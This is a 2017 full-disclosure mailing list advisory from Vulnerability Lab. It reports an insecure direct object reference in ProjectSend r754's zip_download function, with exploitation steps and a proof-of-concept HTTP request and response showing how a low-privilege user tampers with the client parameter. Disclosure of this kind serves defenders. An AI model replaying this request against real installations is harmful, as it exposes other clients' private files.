[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2017-02-22 12:54:15
Message-ID: 45fc4c2e-36d6-1bec-7e5b-d30e94a6d7d2 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2031
Release Date:
=============
2017-02-21
Vulnerability Laboratory ID (VL-ID):
====================================
2031
Common Vulnerability Scoring System:
====================================
5.3
Product & Service Introduction:
===============================
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared \
web hosting account) that lets you upload files and assign them to specific clients that you \
create yourself! Secure, private and easy. No more depending on external services or e-mail to \
send those files.
(Copy of the Homepage: http://www.projectsend.org/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a idor and authentication bypass \
vulnerability in the ProjectSend-r754 web-application.
Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
GNU GPL License
Product: ProjectSend r754
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An insecure direct object references occured in case of an application provides direct access \
to objects based on user-supplied input. As a result of this vulnerability attackers can \
bypass authorization and to access resources in the system. Insecure Direct Object References \
allows attackers to bypass authorization and access resources directly by modifying the value \
of a parameter[client] used. Thus finally point to other client account names, which allows an \
attackers to download others clients private data with no secure method provided.
Vulnerability Method(s):
[+] GET
Vulnerable Module(s):
[+] process.php?do=zip_download
Vulnerable Parameter(s):
[+] client
[+] file
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege \
web-application user account and low user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.
1. User "A" as attacker checks a file to download as zip extension, then click download to \
modifiy values as required ...
2. Application responds with the client file list, so then you are able to download all other \
side user B data files with zip extension
--- PoC Session Logs ---
GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/ProjectSend-r754/my_files/
Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
Connection: keep-alive
-
HTTP/1.1 200 OK
Date: Sun, 05 Feb 2017 19:07:41 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.44-0+deb7u1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 6
Name of Files: .jpg
Video PoC:
https://www.youtube.com/watch?v=Xc6Jg9I7Pj4
Security Risk:
==============
The security risk of the web vulnerability in the ProjectSend-r754 web-application function is \
estimated as medium. (CVSS 5.3)
Credits & Authors:
==================
Lawrence Amer - Vulnerability Laboratory [Research Team] - (http://lawrenceamer.me) \
(https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability mainly for consequential or incidental damages so the \
foregoing limitation may not apply. We do not approve or encourage anybody to break any \
licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or \
information requires authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All \
pictures, texts, advisories, source code, videos and other information on this website is \
trademark of vulnerability-lab team & the specific authors or managers. To record, list, \
modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic